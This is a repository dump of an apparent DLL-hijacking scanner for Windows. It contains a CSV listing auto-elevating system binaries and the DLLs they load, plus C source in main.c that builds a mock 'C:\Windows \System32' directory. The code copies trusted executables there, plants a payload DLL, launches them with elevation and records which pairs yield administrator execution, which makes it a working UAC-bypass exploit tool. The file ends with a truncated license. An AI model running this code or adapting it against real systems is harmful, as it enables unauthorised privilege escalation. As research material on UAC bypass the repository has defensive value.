1488 | TRUE,"rstrui.exe","VssTrace.DLL","DllMain"
1489 | TRUE,"rstrui.exe","wer.dll","DllMain"
1490 | TRUE,"sdclt.exe","bcd.dll","DllMain"
1491 | TRUE,"sdclt.exe","Cabinet.dll","DllMain"
1492 | TRUE,"sdclt.exe","CLDAPI.dll","CfGetPlaceholderStateFromAttributeTag"
1493 | TRUE,"sdclt.exe","CLDAPI.dll","DllMain"
1494 | TRUE,"sdclt.exe","CRYPTBASE.DLL","DllMain"
1495 | TRUE,"sdclt.exe","DPAPI.DLL","DllMain"
1496 | TRUE,"sdclt.exe","edputil.dll","DllMain"
1497 | TRUE,"sdclt.exe","edputil.dll","EdpGetIsManaged"
1498 | TRUE,"sdclt.exe","FLTLIB.DLL","DllMain"
1499 | TRUE,"sdclt.exe","iertutil.dll","DllMain"
1500 | TRUE,"sdclt.exe","MPR.dll","DllMain"
1501 | TRUE,"sdclt.exe","netutils.dll","DllMain"
1502 | TRUE,"sdclt.exe","profapi.dll","DllMain"
1503 | TRUE,"sdclt.exe","PROPSYS.dll","DllMain"
1504 | TRUE,"sdclt.exe","PROPSYS.dll","PSCreateMemoryPropertyStore"
1505 | TRUE,"sdclt.exe","PROPSYS.dll","PSPropertyBag_WriteDWORD"
1506 | TRUE,"sdclt.exe","ReAgent.dll","DllMain"
1507 | TRUE,"sdclt.exe","SPP.dll","DllMain"
1508 | TRUE,"sdclt.exe","SPP.dll","SxTracerGetThreadContextRetail"
1509 | TRUE,"sdclt.exe","srvcli.dll","DllMain"
1510 | TRUE,"sdclt.exe","SspiCli.dll","DllMain"
1511 | TRUE,"sdclt.exe","SspiCli.dll","GetUserNameExW"
1512 | TRUE,"sdclt.exe","urlmon.dll","DllMain"
1513 | TRUE,"sdclt.exe","UxTheme.dll","DllMain"
1514 | TRUE,"sdclt.exe","VSSAPI.DLL","DllMain"
1515 | TRUE,"sdclt.exe","VssTrace.DLL","DllMain"
1516 | TRUE,"sdclt.exe","wer.dll","DllMain"
1517 | TRUE,"sdclt.exe","Wldp.dll","DllMain"
1518 | TRUE,"sdclt.exe","WTSAPI32.dll","DllMain"
1519 | TRUE,"slui.exe","profapi.dll","DllMain"
1520 | TRUE,"slui.exe","PROPSYS.dll","DllMain"
1521 | TRUE,"slui.exe","SLC.dll","DllMain"
1522 | TRUE,"slui.exe","sppc.dll","DllMain"
1523 | TRUE,"slui.exe","WINBRAND.dll","DllMain"
1524 | TRUE,"slui.exe","Wldp.dll","DllMain"
1525 | TRUE,"slui.exe","WTSAPI32.dll","DllMain"
1526 | TRUE,"systempropertiesadvanced.exe","bcd.dll","DllMain"
1527 | TRUE,"systempropertiesadvanced.exe","credui.dll","DllMain"
1528 | TRUE,"systempropertiesadvanced.exe","DNSAPI.dll","DllMain"
1529 | TRUE,"systempropertiesadvanced.exe","DPAPI.dll","DllMain"
1530 | TRUE,"systempropertiesadvanced.exe","DSROLE.DLL","DllMain"
1531 | TRUE,"systempropertiesadvanced.exe","DSROLE.DLL","DsRoleGetPrimaryDomainInformation"
1532 | TRUE,"systempropertiesadvanced.exe","LOGONCLI.DLL","DllMain"
1533 | TRUE,"systempropertiesadvanced.exe","NETAPI32.dll","DllMain"
1534 | TRUE,"systempropertiesadvanced.exe","netid.dll","CreateNetIDPropertyPage"
1535 | TRUE,"systempropertiesadvanced.exe","netid.dll","DllMain"
1536 | TRUE,"systempropertiesadvanced.exe","NETUTILS.DLL","DllMain"
1537 | TRUE,"systempropertiesadvanced.exe","profapi.dll","DllMain"
1538 | TRUE,"systempropertiesadvanced.exe","SRVCLI.DLL","DllMain"
1539 | TRUE,"systempropertiesadvanced.exe","TextShaping.dll","DllMain"
1540 | TRUE,"systempropertiesadvanced.exe","USERENV.dll","DllMain"
1541 | TRUE,"systempropertiesadvanced.exe","WINBRAND.dll","DllMain"
1542 | TRUE,"systempropertiesadvanced.exe","WINSTA.dll","DllMain"
1543 | TRUE,"systempropertiesadvanced.exe","WKSCLI.DLL","DllMain"
1544 | TRUE,"systempropertiesadvanced.exe","Wldp.dll","DllMain"
1545 | TRUE,"systempropertiescomputername.exe","bcd.dll","DllMain"
1546 | TRUE,"systempropertiescomputername.exe","profapi.dll","DllMain"
1547 | TRUE,"systempropertiescomputername.exe","USERENV.dll","DllMain"
1548 | TRUE,"systempropertiescomputername.exe","WINSTA.dll","DllMain"
1549 | TRUE,"systempropertiesdataexecutionprevention.exe","bcd.dll","DllMain"
1550 | TRUE,"systempropertiesdataexecutionprevention.exe","profapi.dll","DllMain"
1551 | TRUE,"systempropertiesdataexecutionprevention.exe","USERENV.dll","DllMain"
1552 | TRUE,"systempropertiesdataexecutionprevention.exe","WINSTA.dll","DllMain"
1553 | TRUE,"systempropertieshardware.exe","bcd.dll","DllMain"
1554 | TRUE,"systempropertieshardware.exe","profapi.dll","DllMain"
1555 | TRUE,"systempropertieshardware.exe","USERENV.dll","DllMain"
1556 | TRUE,"systempropertieshardware.exe","WINSTA.dll","DllMain"
1557 | TRUE,"systempropertiesprotection.exe","bcd.dll","DllMain"
1558 | TRUE,"systempropertiesprotection.exe","profapi.dll","DllMain"
1559 | TRUE,"systempropertiesprotection.exe","USERENV.dll","DllMain"
1560 | TRUE,"systempropertiesprotection.exe","WINSTA.dll","DllMain"
1561 | TRUE,"systempropertiesremote.exe","bcd.dll","DllMain"
1562 | TRUE,"systempropertiesremote.exe","profapi.dll","DllMain"
1563 | TRUE,"systempropertiesremote.exe","USERENV.dll","DllMain"
1564 | TRUE,"systempropertiesremote.exe","WINSTA.dll","DllMain"
1565 | TRUE,"systemreset.exe","bcd.dll","BcdCloseObject"
1566 | TRUE,"systemreset.exe","bcd.dll","BcdCloseStore"
1567 | TRUE,"systemreset.exe","bcd.dll","BcdFlushStore"
1568 | TRUE,"systemreset.exe","bcd.dll","BcdGetElementData"
1569 | TRUE,"systemreset.exe","bcd.dll","BcdOpenObject"
1570 | TRUE,"systemreset.exe","bcd.dll","BcdOpenStore"
1571 | TRUE,"systemreset.exe","bcd.dll","DllMain"
1572 | TRUE,"systemreset.exe","Cabinet.dll","DllMain"
1573 | TRUE,"systemreset.exe","d3d10warp.dll","DllMain"
1574 | TRUE,"systemreset.exe","d3d10warp.dll","OpenAdapter10_2"
1575 | TRUE,"systemreset.exe","d3d11.dll","D3D11CreateDevice"
1576 | TRUE,"systemreset.exe","d3d11.dll","DllMain"
1577 | TRUE,"systemreset.exe","dbgcore.DLL","DllMain"
1578 | TRUE,"systemreset.exe","DismApi.DLL","DllMain"
1579 | TRUE,"systemreset.exe","DUI70.dll","DllMain"
1580 | TRUE,"systemreset.exe","dxgi.dll","CreateDXGIFactory1"
1581 | TRUE,"systemreset.exe","dxgi.dll","DllMain"
1582 | TRUE,"systemreset.exe","FVEAPI.dll","DllMain"
1583 | TRUE,"systemreset.exe","FVEAPI.dll","FveGetStatus"
1584 | TRUE,"systemreset.exe","FVEAPI.dll","FveOpenVolumeW"
1585 | TRUE,"systemreset.exe","MSASN1.dll","DllMain"
1586 | TRUE,"systemreset.exe","profapi.dll","DllMain"
1587 | TRUE,"systemreset.exe","ReAgent.dll","DllMain"
1588 | TRUE,"systemreset.exe","ReAgent.dll","WinReGetConfig"
1589 | TRUE,"systemreset.exe","ResetEngine.dll","DllMain"
1590 | TRUE,"systemreset.exe","ResetEngine.dll","ResetCreateSession"
1591 | TRUE,"systemreset.exe","ResetEngine.dll","ResetReleaseSession"
1592 | TRUE,"systemreset.exe","ResetEngine.dll","ResetTraceClientInfo"
1593 | TRUE,"systemreset.exe","ResetEngine.dll","ResetValidateScenario"
1594 | TRUE,"systemreset.exe","tbs.dll","DllMain"
1595 | TRUE,"systemreset.exe","VERSION.dll","DllMain"
1596 | TRUE,"systemreset.exe","VSSAPI.DLL","DllMain"
1597 | TRUE,"systemreset.exe","VssTrace.DLL","DllMain"
1598 | TRUE,"systemreset.exe","WDSCORE.dll","ConstructPartialMsgVW"
1599 | TRUE,"systemreset.exe","WDSCORE.dll","CurrentIP"
1600 | TRUE,"systemreset.exe","WDSCORE.dll","DllMain"
1601 | TRUE,"systemreset.exe","WDSCORE.dll","WdsInitialize"
1602 | TRUE,"systemreset.exe","WDSCORE.dll","WdsSetupLogMessageW"
1603 | TRUE,"systemreset.exe","WIMGAPI.DLL","DllMain"
1604 | TRUE,"systemreset.exe","WIMGAPI.DLL","WIMCreateFile"
1605 | TRUE,"systemreset.exe","WINHTTP.dll","DllMain"
1606 | TRUE,"systemreset.exe","WOFUTIL.dll","DllMain"
1607 | TRUE,"systemreset.exe","WTSAPI32.dll","DllMain"
1608 | TRUE,"systemreset.exe","XmlLite.dll","DllMain"
1609 | TRUE,"systemsettingsadminflows.exe","AppXDeploymentClient.dll","DllMain"
1610 | TRUE,"systemsettingsadminflows.exe","Bcp47Langs.dll","DllMain"
1611 | TRUE,"systemsettingsadminflows.exe","DEVOBJ.dll","DllMain"
1612 | TRUE,"systemsettingsadminflows.exe","DEVRTL.dll","DllMain"
1613 | TRUE,"systemsettingsadminflows.exe","DismApi.DLL","DllMain"
1614 | TRUE,"systemsettingsadminflows.exe","DNSAPI.dll","DllMain"
1615 | TRUE,"systemsettingsadminflows.exe","DUI70.dll","DllMain"
1616 | TRUE,"systemsettingsadminflows.exe","FirewallAPI.dll","DllMain"
1617 | TRUE,"systemsettingsadminflows.exe","fwbase.dll","DllMain"
1618 | TRUE,"systemsettingsadminflows.exe","fwbase.dll","FwCriticalSectionCreate"
1619 | TRUE,"systemsettingsadminflows.exe","fwbase.dll","FwCriticalSectionDestroy"
1620 | TRUE,"systemsettingsadminflows.exe","logoncli.dll","DllMain"
1621 | TRUE,"systemsettingsadminflows.exe","netutils.dll","DllMain"
1622 | TRUE,"systemsettingsadminflows.exe","newdev.dll","DllMain"
1623 | TRUE,"systemsettingsadminflows.exe","PROPSYS.dll","DllMain"
1624 | TRUE,"systemsettingsadminflows.exe","samcli.dll","DllMain"
1625 | TRUE,"systemsettingsadminflows.exe","SspiCli.dll","DllMain"
1626 | TRUE,"systemsettingsadminflows.exe","StateRepository.Core.dll","DllMain"
1627 | TRUE,"systemsettingsadminflows.exe","SystemSettingsThresholdAdminFlowUI.dll","DllMain"
1628 | TRUE,"systemsettingsadminflows.exe","timesync.dll","DllMain"
1629 | TRUE,"systemsettingsadminflows.exe","USERENV.dll","DllMain"
1630 | TRUE,"systemsettingsadminflows.exe","VERSION.dll","DllMain"
1631 | TRUE,"systemsettingsadminflows.exe","WINBRAND.dll","DllMain"
1632 | TRUE,"systemsettingsadminflows.exe","wincorlib.DLL","DllMain"
1633 | TRUE,"systemsettingsadminflows.exe","wkscli.dll","DllMain"
1634 | TRUE,"systemsettingsadminflows.exe","Wldp.dll","DllMain"
1635 | TRUE,"systemsettingsadminflows.exe","WTSAPI32.dll","DllMain"
1636 | TRUE,"taskmgr.exe","credui.dll","DllMain"
1637 | TRUE,"taskmgr.exe","d3d11.dll","DllMain"
1638 | TRUE,"taskmgr.exe","d3d12.dll","DllMain"
1639 | TRUE,"taskmgr.exe","dxgi.dll","DllMain"
1640 | TRUE,"taskmgr.exe","pdh.dll","DllMain"
1641 | TRUE,"taskmgr.exe","UxTheme.dll","DllMain"
1642 | TRUE,"tcmsetup.exe","TAPI32.dll","DllMain"
1643 | TRUE,"winsat.exe","d3d10.dll","DllMain"
1644 | TRUE,"winsat.exe","d3d10_1.dll","DllMain"
1645 | TRUE,"winsat.exe","d3d10_1core.dll","DllMain"
1646 | TRUE,"winsat.exe","d3d10core.dll","DllMain"
1647 | TRUE,"winsat.exe","d3d11.dll","DllMain"
1648 | TRUE,"winsat.exe","dxgi.dll","DllMain"
1649 | TRUE,"winsat.exe","winmm.dll","DllMain"
1650 | TRUE,"wsreset.exe","licensemanagerapi.dll","DllMain"
1651 | TRUE,"wsreset.exe","licensemanagerapi.dll","Reset"
1652 | TRUE,"wsreset.exe","wevtapi.dll","DllMain"
1653 | TRUE,"wsreset.exe","Wldp.dll","DllMain"
1654 | TRUE,"wusa.exe","dpx.dll","DllMain"
1655 | TRUE,"wusa.exe","WTSAPI32.dll","DllMain"
1656 | 


--------------------------------------------------------------------------------
/DLLHijacking/main.c:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #include <stdio.h>
  3 | #include "Header.h"
  4 | #include "resource.h"
  5 | 
  6 | #define DEBUG FALSE
  7 | 
  8 | const char* windowsFakePath = "C:\\Windows \\";
  9 | const char* system32FakePath = "C:\\Windows \\System32";
 10 | 
 11 | void printfDebug(const char* format, ...) {
 12 | #ifndef DEBUG
 13 |     va_list args;
 14 |     va_start(args, format);
 15 |     printf("\t");
 16 |     vprintf(format, args);
 17 |     va_end(args);
 18 | #endif
 19 | }
 20 | 
 21 | BOOL CheckExploit(char* exeName, char* dllName) {
 22 |     FILE* pFile;
 23 |     BOOL IsRunAsAdmin = FALSE;
 24 |     BOOL IsCurrentDll = FALSE;
 25 |     const char* logFile = "C:\\ProgramData\\exploit.txt";
 26 | 
 27 |     char *fileBuffer = (char*)malloc(MAX_PATH * 3);
 28 |     if (fileBuffer == NULL) {
 29 |         printf("[-] Failed to allocate memory\n");
 30 |         return FALSE;
 31 |     }
 32 | 
 33 |     if (fopen_s(&pFile, logFile, "r") != 0) {
 34 |         printfDebug("\t[-] Failed to open file %s\n", logFile);
 35 |         free(fileBuffer);
 36 |         return FALSE;
 37 |     }
 38 |     fscanf_s(pFile, "%i", &IsRunAsAdmin);
 39 |     fseek(pFile, 2, SEEK_SET);
 40 |     if (fgets(fileBuffer, MAX_PATH * 3, pFile) == NULL) {
 41 |         printfDebug("\t[-] Failed to read file %s\n", logFile);
 42 |         fclose(pFile);
 43 |         free(fileBuffer);
 44 |         return FALSE;
 45 |     }
 46 |     fclose(pFile);
 47 |     IsCurrentDll = (strstr(fileBuffer, exeName) != NULL && strstr(fileBuffer, dllName) != NULL);
 48 | 
 49 |     if (DeleteFileA(logFile))
 50 |         printfDebug("[-] Fail to cleanup log file: %s\n", logFile);
 51 |     free(fileBuffer);
 52 |     return IsRunAsAdmin && IsCurrentDll;
 53 | };
 54 | 
 55 | 
 56 | BOOL CreateFakeDirectory() {
 57 |     if (!CreateDirectoryA(windowsFakePath, NULL)) {
 58 |         int lastError = GetLastError();
 59 |         if (lastError != ERROR_ALREADY_EXISTS) {
 60 |             printf("[-] Failed to create directory: %s (%ld)\n", windowsFakePath, lastError);
 61 |             return FALSE;
 62 |         }
 63 |     }
 64 |     if (!CreateDirectoryA(system32FakePath, NULL)) {
 65 |         int lastError = GetLastError();
 66 |         if (lastError != ERROR_ALREADY_EXISTS) {
 67 |             printf("[-] Failed to create directory: %s (%ld)\n", system32FakePath, lastError);
 68 |             return FALSE;
 69 |         }
 70 |     }
 71 |     return TRUE;
 72 | }
 73 | 
 74 | BOOL CopyExeFile(char* system32Path, char* fileName) {
 75 |     char* fullPathInt = (char*)malloc(MAX_PATH);
 76 |     if (fullPathInt == NULL) {
 77 |         printf("[-] Failed to allocate memory\n");
 78 |         return FALSE;
 79 |     }
 80 |     char* fullPathOut = (char*)malloc(MAX_PATH);
 81 |     if (fullPathOut == NULL) {
 82 |         printf("[-] Failed to allocate memory\n");
 83 |         free(fullPathInt);
 84 |         return FALSE;
 85 |     }
 86 |     sprintf_s(fullPathInt, MAX_PATH, "%s\\%s", system32Path, fileName);
 87 |     sprintf_s(fullPathOut, MAX_PATH, "C:\\Windows \\System32\\%s", fileName);
 88 |     if (!CopyFileA(fullPathInt, fullPathOut, FALSE)) {
 89 |         printfDebug("[-] Failed to copy file %s (%ld)\n", fullPathOut, GetLastError());
 90 |         free(fullPathOut);
 91 |         free(fullPathInt);
 92 |         return FALSE;
 93 |     }
 94 |     printfDebug("[+] File copied: %s -> %s \n", fullPathInt, fullPathOut);
 95 | 
 96 |     free(fullPathOut);
 97 |     free(fullPathInt);
 98 |     return TRUE;
 99 | }
100 | BOOL CopyDllFile(char* fileName, char* targetDll) {
101 |     char* fullPathOut = (char*)malloc(MAX_PATH);
102 |     if (fullPathOut == NULL) {
103 |         printf("[-] Failed to allocate memory\n");
104 |         return FALSE;
105 |     }
106 |     sprintf_s(fullPathOut, MAX_PATH, "C:\\Windows \\System32\\%s", fileName);
107 |     if (!CopyFileA(targetDll, fullPathOut, FALSE)) {
108 |         printfDebug("[-] Failed to copy file %s (%ld)\n", fullPathOut, GetLastError());
109 |         free(fullPathOut);
110 |         return FALSE;
111 |     }
112 |     printfDebug("[+] File copied: %s -> %s \n", targetDll, fullPathOut);
113 | 
114 |     free(fullPathOut);
115 |     return TRUE;
116 | }
117 | BOOL CopyDllFileResource(char* fileName, int resouceId, char* resouceName) {
118 |     char* fullPathOut = (char*)malloc(MAX_PATH);
119 |     HMODULE hMod;
120 | 
121 |     if (fullPathOut == NULL) {
122 |         printf("[-] Failed to allocate memory\n");
123 |         return FALSE;
124 |     }
125 |     sprintf_s(fullPathOut, MAX_PATH, "C:\\Windows \\System32\\%s", fileName);
126 | 
127 |     hMod = GetModuleHandleA(NULL);
128 |     if (hMod != NULL) {
129 |         HRSRC res = FindResourceA(hMod, MAKEINTRESOURCEA(resouceId), resouceName);
130 |         if (res != NULL) {
131 |             DWORD dllSize = SizeofResource(hMod, res);
132 |             void* dllBuff = LoadResource(hMod, res);
133 |             HANDLE hDll = CreateFileA(fullPathOut, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL);
134 |             if (hDll != INVALID_HANDLE_VALUE) {
135 |                 DWORD sizeOut;
136 |                 WriteFile(hDll, dllBuff, dllSize, &sizeOut, NULL);
137 |                 CloseHandle(hDll);
138 |                 free(fullPathOut);
139 |                 printfDebug("[+] File dropped: %s \n", fullPathOut);
140 |                 return TRUE;
141 |             } else {
142 |                 int lastError = GetLastError();
143 |                 if (lastError != 32) { // ERROR_SHARING_VIOLATION -> ERROR_ALREADY_EXISTS
144 |                     printf("[-] Failed to create file: %s (%ld)\n", fullPathOut, lastError);
145 |                     free(fullPathOut);
146 |                     return FALSE;
147 |                 } else {
148 |                     printfDebug("[+] File already exists: %s \n", fullPathOut);
149 |                 }
150 |             }
151 |         } else
152 |             printf("[-] Fail to Find Resource DATA !\n");
153 |     } else
154 |         printf("[-] Fail to GetModuleHandleA !\n");
155 |     free(fullPathOut);
156 |     return FALSE;
157 | }
158 | BOOL Trigger(char* fileName) {
159 |     SHELLEXECUTEINFOA sinfo = { 0 };
160 | 
161 |     char* fullPath = (char*)malloc(MAX_PATH);
162 |     if (fullPath == NULL) {
163 |         printf("[-] Failed to allocate memory\n");
164 |         return FALSE;
165 |     }
166 |     sprintf_s(fullPath, MAX_PATH, "C:\\Windows \\System32\\%s", fileName);
167 |     printfDebug("[+] Triggering: %s\n", fullPath);
168 | 
169 |     sinfo.cbSize = sizeof(SHELLEXECUTEINFOA);
170 |     sinfo.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_NO_UI;
171 |     sinfo.hwnd = NULL;
172 |     sinfo.lpVerb = "runas";
173 |     sinfo.lpFile = fullPath;
174 |     sinfo.lpParameters = NULL;
175 |     sinfo.lpDirectory = "C:\\Windows \\System32\\";
176 |     sinfo.nShow = SW_HIDE;
177 |     sinfo.hInstApp = NULL;
178 | 
179 |     SetErrorMode(SEM_FAILCRITICALERRORS | SEM_NOALIGNMENTFAULTEXCEPT | SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX);
180 |         
181 |     if (!ShellExecuteExA(&sinfo) || sinfo.hProcess == NULL) {
182 |         printfDebug("[-] Failed to create process %ld\n", GetLastError());
183 |         return FALSE;
184 |     }
185 |     if (WaitForSingleObject(sinfo.hProcess, 100) == WAIT_TIMEOUT) {
186 |         printfDebug("[-] Process create timout (%s).\n", fileName);
187 |         if(!TerminateProcess(sinfo.hProcess, 1))
188 |             printfDebug("[-] Fail to terminate process (%s)!\n", fileName);
189 |     }
190 |     CloseHandle(sinfo.hProcess);
191 | 
192 |     free(fullPath);
193 |     return TRUE;
194 | }
195 | 
196 | BOOL RemoveFakeDirectory() {
197 |     if (!RemoveDirectoryA(system32FakePath)) {
198 |         printfDebug("[-] Failed to remove directory %ld\n", GetLastError());
199 |         return FALSE;
200 |     }
201 |     if (!RemoveDirectoryA(windowsFakePath)) {
202 |         printfDebug("[-] Failed to remove directory %ld\n", GetLastError());
203 |         return FALSE;
204 |     }
205 |     return TRUE;
206 | }
207 | BOOL CleanUpFakeDirectory(char* exeName, char* dllName) {
208 |     char* bufferFilePath = (char*)malloc(MAX_PATH);
209 |     if (bufferFilePath == NULL)
210 |         return FALSE;
211 | 
212 |     sprintf_s(bufferFilePath, MAX_PATH, "%s\\%s", system32FakePath, exeName);
213 |     if (!DeleteFileA(bufferFilePath))
214 |         printfDebug("[-] Failed to delete file %s (%ld)\n", bufferFilePath, GetLastError());
215 | 
216 |     sprintf_s(bufferFilePath, MAX_PATH, "%s\\%s", system32FakePath, dllName);
217 |     if (!DeleteFileA(bufferFilePath))
218 |         printfDebug("[-] Failed to delete file %s (%ld)\n", bufferFilePath, GetLastError());
219 |     free(bufferFilePath);
220 |     return TRUE;
221 | }
222 | BOOL FullCleanUp() {
223 |     WIN32_FIND_DATAA fd;
224 |     HANDLE hFind = FindFirstFileA("C:\\Windows \\System32\\*.*", &fd);
225 |     int iFailRemove = 0;
226 | 
227 |     if (hFind == INVALID_HANDLE_VALUE) {
228 |         printfDebug("[-] Failed to find files in directory %s (%ld)\n", system32FakePath, GetLastError());
229 |         return FALSE;
230 |     }
231 |     do {
232 |         if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
233 |             continue;
234 |         char* bufferFilePath = (char*)malloc(MAX_PATH);
235 |         if (bufferFilePath == NULL)
236 |             return FALSE;
237 |         sprintf_s(bufferFilePath, MAX_PATH, "%s\\%s", system32FakePath, fd.cFileName);
238 |         if (!DeleteFileA(bufferFilePath)) {
239 |             printfDebug("[-] Failed to delete file %s (%ld)\n", bufferFilePath, GetLastError());
240 |             iFailRemove++;
241 |         }
242 |         free(bufferFilePath);
243 |     } while (FindNextFileA(hFind, &fd));
244 |     FindClose(hFind);
245 |     if(iFailRemove > 0)
246 |         printf("[-] Failed to delete %i files (Need manual clean up)! \n", iFailRemove);
247 |     RemoveFakeDirectory();
248 |     return TRUE;
249 | }
250 | BOOL Exploit(char* TargetDll, char* exeName, char* dllName, char* system32Path) {
251 |     CreateFakeDirectory();
252 |     CopyExeFile(system32Path, exeName);
253 |     if (TargetDll == NULL) {
254 | #if _WIN64
255 |         CopyDllFileResource(dllName, IDR_DATA2, "DATA_64"); // 32 - 64 
256 | #else
257 |         CopyDllFileResource(dllName, IDR_DATA1, "DATA_32"); // 32 - 64 
258 | #endif
259 |     } else
260 |         CopyDllFile(dllName, TargetDll);
261 |     Trigger(exeName);
262 |     Sleep(100);
263 |     CleanUpFakeDirectory(exeName, dllName);
264 |     return CheckExploit(exeName, dllName);
265 | }
266 | 
267 | VOID Banner() {
268 |     printf("\n   ______ _      _        _   _ _____   ___  ___  _____  _   _______ _   _ _____ \n");
269 |     printf("   |  _  \\ |    | |      | | | |_   _| |_  |/ _ \\/  __ \\| | / /_   _| \\ | |  __ \\\n");
270 |     printf("   | | | | |    | |      | |_| | | |     | / /_\\ \\ /  \\/| |/ /  | | |  \\| | |  \\/\n");
271 |     printf("   | | | | |    | |      |  _  | | |     | |  _  | |    |    \\  | | | . ` | | __ \n");
272 |     printf("   | |/ /| |____| |____  | | | |_| |_/\\__/ / | | | \\__/\\| |\\  \\_| |_| |\\  | |_\\ \\\n");
273 |     printf("   |___/ \\_____/\\_____/  \\_| |_/\\___/\\____/\\_| |_/\\____/\\_| \\_/\\___/\\_| \\_/\\____/\n\n\n");
274 | }
275 | 
276 | 
277 | int main(int argc, char** argv) {
278 |     char* TargetDll = NULL;
279 |     int iVulnPe = 0;
280 |     int iTestPe = 0;
281 | 
282 |     Banner();
283 |     if (argc == 2)
284 |         TargetDll = argv[1];
285 |     else if (argc > 2) {
286 |         printf("[!] Invalid number of argument !\n\n");
287 |         printf("%s [DLL_PATH]\n\n", argv[0]);
288 |         return TRUE;
289 |     }
290 | 
291 |     char* system32Path = (char*)malloc(sizeof(char) * MAX_PATH);
292 |     if (system32Path == NULL) {
293 |         printf("[-] Failed to allocate memory\n");
294 |         return TRUE;
295 |     }
296 |     if (!GetSystemDirectoryA(system32Path, MAX_PATH)) {
297 |         printf("[-] Failed to get system directory\n");
298 |         free(system32Path);
299 |         return TRUE;
300 |     }
301 |     printf("[+] System directory: '%s'\n", system32Path);
302 |     printf("[+] System fake directory: 'c:\\WINDOWS \\system32'\n\n");
303 | 
304 | 
305 |     FILE* pFileLog;
306 |     if (fopen_s(&pFileLog, "exploitable.log", "w") != 0) {
307 |         printf("[-] Fail to open file exploitable.log (%ld)!\n", GetLastError());
308 |         free(system32Path);
309 |         return TRUE;
310 |     }
311 | 
312 |     printf("[+] Running exploit:\n");
313 |     for (int i = 0; i < sizeof(dllList) / sizeof(DllList); i++) {
314 |         for (int j = 0; j < dllList[i].tableSize; j++) {
315 |             if (Exploit((char*)TargetDll, (char*)dllList[i].name, (char*)dllList[i].dllTable[j], system32Path)) {
316 |                 printf("\t[*] Vulnerable: %s -> %s\n", dllList[i].name, dllList[i].dllTable[j]);
317 |                 fprintf(pFileLog, "1,%s,%s\n", dllList[i].name, dllList[i].dllTable[j]);
318 |                 iVulnPe++;
319 |             } else
320 |                 fprintf(pFileLog, "0,%s,%s\n", dllList[i].name, dllList[i].dllTable[j]);
321 |             iTestPe++;
322 |         }
323 |     }
324 | 
325 |     printf("\n[i] Number of test performe: %i/%i\n", iVulnPe, iTestPe);
326 | 
327 |     FullCleanUp();
328 |     fclose(pFileLog);
329 |     free(system32Path);
330 |     return FALSE;
331 | }


--------------------------------------------------------------------------------
/DLLHijacking/resource.h:
--------------------------------------------------------------------------------
 1 | //{{NO_DEPENDENCIES}}
 2 | // Microsoft Visual C++ generated include file.
 3 | // Used by ConsoleApplication1.rc
 4 | //
 5 | #define IDR_DATA1                       101
 6 | #define IDR_DATA2                       102
 7 | 
 8 | 
 9 | // Next default values for new objects
10 | // 
11 | #ifdef APSTUDIO_INVOKED
12 | #ifndef APSTUDIO_READONLY_SYMBOLS
13 | #define _APS_NEXT_RESOURCE_VALUE        103
14 | #define _APS_NEXT_COMMAND_VALUE         40001
15 | #define _APS_NEXT_CONTROL_VALUE         1001
16 | #define _APS_NEXT_SYMED_VALUE           101
17 | #endif
18 | #endif
19 | 


--------------------------------------------------------------------------------
/ExploitResult.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecuProject/DLLHijackingScanner/c492490e665befe97124d2683680e5a8818baaad/ExploitResult.png


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 | Apache License
  2 |                            Version 2.0, January 2004
  3 |                         http://www.apache.org/licenses/
  4 | 
  5 |    TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
  6 | 
  7 |    1. Definitions.
  8 | 
  9 |       "License" shall mean the terms and conditions for use, reproduction,
 10 |       and distribution as defined by Sections 1 through 9 of this document.
 11 | 
 12 |       "Licensor" shall mean the copyright owner or entity authorized by
 13 |       the copyright owner that is granting the License.
 14 | 
 15 |       "Legal Entity" shall mean the union of the acting entity and all
 16 |       other entities that control, are controlled by, or are under common
 17 |       control with that entity. For the purposes of this definition,
 18 |       "control" means (i) the power, direct or indirect, to cause the
 19 |       direction or management of such entity, whether by contract or
 20 |       otherwise, or (ii) ownership of fifty percent (50%) or more of the
 21 |       outstanding shares, or (iii) beneficial ownership of such entity.
 22 | 
 23 |       "You" (or "Your") shall mean an individual or Legal Entity
 24 |       exercising permissions granted by this License.
 25 | 
 26 |       "Source" form shall mean the preferred form for making modifications,
 27 |       including but not limited to software source code, documentation
 28 |       source, and configuration files.
 29 | 
 30 |       "Object" form shall mean any form resulting from mechanical
 31 |       transformation or translation of a Source form, including but
 32 |       not limited to compiled object code, generated documentation,
 33 |       and conversions to other media types.
 34 | 
 35 |       "Work" shall mean the work of authorship, whether in Source or
 36 |       Object form, made available under the License, as indicated by a
 37 |       copyright notice that is included in or attached to the work
 38 |       (an example is provided in the Appendix below).
 39 | 
 40 |       "Derivative Works" shall mean any work, whether in Source or Object
 41 |       form, that is based on (or derived from) the Work and for which the
 42 |       editorial revisions, annotations, elaborations, or other modifications
 43 |       represent, as a whole, an original work of authorship. For the purposes
 44 |       of this License, Derivative Works shall not include works that remain
 45 |       separable from, or merely link (or bind by name) to the interfaces of,
 46 |       the Work and Derivative Works thereof.
 47 | 
 48 |       "Contribution" shall mean any work of authorship, including
 49 |       the original version of the Work and any modifications or additions
 50 |       to that Work or Derivative Works thereof, that is intentionally
 51 |       submitted to Licensor for inclusion in the Work by the copyright owner
 52 |       or by an individual or Legal Entity authorized to submit on behalf of
 53 |       the copyright owner. For the purposes of this definition, "submitted"
 54 |       means any form of electronic, verbal, or written communication sent
 55 |       to the Licensor or its representatives, including but not limited to
 56 |       communication on electronic mailing lists, source code control systems,
 57 |       and issue tracking systems that are managed by, or on behalf of, the
 58 |       Licensor for the purpose of discussing and improving the Work, but
 59 |       excluding communication that is conspicuously marked or otherwise
 60 |       designated in writing by the copyright owner as "Not a Contribution."
 61 | 
 62 |       "Contributor" shall mean Licensor and any individual or Legal Entity
 63 |       on behalf of whom a Contribution has been received by Licensor and
 64 |       subsequently incorporated within the Work.
 65 | 
 66 |    2. Grant of Copyright License. Subject to the terms and conditions of
 67 |       this License, each Contributor hereby grants to You a perpetual,
 68 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 69 |       copyright license to reproduce, prepare Derivative Works of,
 70 |       publicly display, publicly perform, sublicense, and distribute the
